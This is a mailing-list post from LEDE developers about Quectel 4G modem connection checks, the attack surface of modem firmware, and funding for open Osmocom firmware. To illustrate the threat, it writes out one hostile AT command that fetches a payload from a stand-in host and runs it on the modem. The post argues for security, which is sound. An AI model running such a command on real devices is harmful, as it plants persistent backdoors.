[LEDE-DEV] Open and secure firmware for Quectel 4G modems [Was: Re: Quectel EC20 QMI autoconnect issues [Was: Re: [LEDE-DEV, 3/3, v3] uqmi: Prevent 'POLICY MISMATCH' error.]]

Petr Štetiar ynezz at true.cz
Sun Jan 8 11:26:23 PST 2017

Adding laforge and zecke to the Cc loop.

Matti Laakso <malaakso at elisanet.fi> [2017-01-08 14:39:34]:


> I'm almost done with checking the connection state using a proto_run_command
> with a simple script running uqmi --get-data-status periodically. If the
> check fails, the script dies and netifd should restart the connection. Then
> we hopefully don't need autoconnect anymore.

I'm not using the autoconnect feature anymore, I'm using simple custom
script[1]. I wouldn't recommend using Qualcomm's implementation of QMI as the
source of truth about the connection status, I think it's more reliable to use
ping, wget/curl or some other more appropriate and battle tested solution.

Simply said, uqmi can lie to you about the connection status. It's just some
qmuxd[2] after all using dozen threads answering you :-) What can probably go
wrong, right?

> > And I've seen "33C3: Dissecting modern (3G/4G) cellular modems", which makes
> > a lot of things crystal clear :-)
> That's an interesting talk, thanks for the note!

Indeed, it's very interesting and very scary. This modems are quite powerful
devices, usually equiped with very good, but limited uplink connection, still
making it ideal candidate for DDoS botnet for example, like any other router,
camera or IoT device. It's just a matter of time we see something like this in
the wild.  The probability is very high, 1.5M lines of just kernel code done
probably in a hurry, without proper review, this is very big attack surface.

It's better to not think about the system in the modem as a nice place for a
hideout for a very persistent backdoor to our systems, surviving even firmware
updates.  Just imagine some trojan inside the router running following on the
modem's AT command serial interface:

   AT+QLINUXCMD=wget http://something/evil && ./evil

Guys at Osmocom already started working on completely open and more secure
firmware using OpenEmbedded, but I would like to see it supported in LEDE
also, probably with more mainline kernel if possible. Still, it's quite
strange to see such a big embedded systems running in the 4G modem. It seems
like 2017 is era of SITSes, Systems In The Systems.

I use Quectel modems already, so I would love to work on this myself, but I've
few other projects with higher priorities going on now, so I'm rather thinking
about other way of supporting this very promising project.

So far the best idea lying in my head currently is buying few modems + mPCIe
breakout boards[3] and deliver those to interested developers. I'm just not
sure if this kind of support is going to lead somewhere.  Simply said, I'm
willing to spend some money in exchange of faster development of this project.

1. http://lists.infradead.org/pipermail/lede-dev/2016-October/003504.html
2. https://osmocom.org/projects/quectel-modems/wiki/Qmuxd
3. http://osmocom.org/projects/mpcie-breakout

-- ynezz

More information about the Lede-dev mailing list